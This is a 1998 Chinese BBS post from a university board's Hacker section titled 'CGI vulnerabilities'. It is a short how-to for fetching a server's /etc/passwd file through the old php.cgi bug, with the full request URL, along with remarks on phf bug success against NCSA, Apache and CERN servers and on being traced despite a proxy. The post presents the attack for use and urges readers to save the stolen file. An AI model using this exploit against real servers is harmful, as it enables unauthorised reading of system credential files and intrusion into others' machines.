荔园在线
荔园之美,在春之萌芽,在夏之绽放,在秋之收获,在冬之沉淀
[回到开始]
[上一篇][下一篇]
发信人: Lg (北斗七星), 信区: Hacker
标 题: CGI的漏洞
发信站: BBS 荔园晨风站 (Mon Sep 21 17:10:45 1998), 站内信件
From:
calvin
Subject:
CGI的漏洞
(Reply)
Date:
Thu Sep 17 14:49:48 1998
你 是 不 是 用 phf 的 bug 都 抓 不 到 /etc/passwd 呢??? Try this
[1] 打 开 你 的 Browser
[2] 连 到 www.yournet.net
[3] 在 Location 输 入 http://www.yournet.net/cgi-bin/php.cgi?/etc/passwd
[4] 发 生 了 甚 么 事?? /etc/passwd 在 你 的 浏 览 器 中 “显 示” 出 来
了!! 快 点 Save 吧!!
Phf 的 bug 在 本 人 的 观 查 中 以 NCSA 的 成 功 最 多, 那
Apache/1.2.0., CERN/3.0A., 也 有 过 成 功 的 例 子, 不 过 有 的 站 都 已
经 写 了 程 序, 如 果 你 用 proxy 去 抓 的 话, 还 是 会 把 你 本 来 的 IP
的 抓 出 来, 那 他 们 会 跟 你 的 ISP 说, 那 ISP 会 处 分 你, 本 人 就 被
取 消 帐 号 过 .......... 唉 ...... 我 的 固 定 IP!
--
@@@@@@ @@@ @@@ @@@ @@@ 信言不美,美言不信。善者不辩,辩
@@@@@@@ @@! @@@ @@@ @@! @@@ @@@ @@!@!@@@ 者不善。知者不博,博者不知。圣人
!@@ @!@!@!@! @@! @!@ !@! @@! @!@@!!@! 不积,既以为人己愈有,既以与人己
!@! !!: !!! @!! !: .:! !!@ !!: !!! 愈多。天之道,利而不害;圣人之
:!! : : : !!: :: !!: :: : 道,为而不争。
:: :: : : ::.:: : Email:calvin@gz168.com
※ 来源:.华南网木棉站 bbs.gznet.edu.cn.[FROM: 202.38.212.85]
--
☆ 来源:.BBS 荔园晨风站 bbs.szu.edu.cn.[FROM: 210.39.0.47]
[回到开始]
[上一篇][下一篇]
荔园在线首页 友情链接:深圳大学 深大招生 荔园晨风BBS S-Term软件 网络书店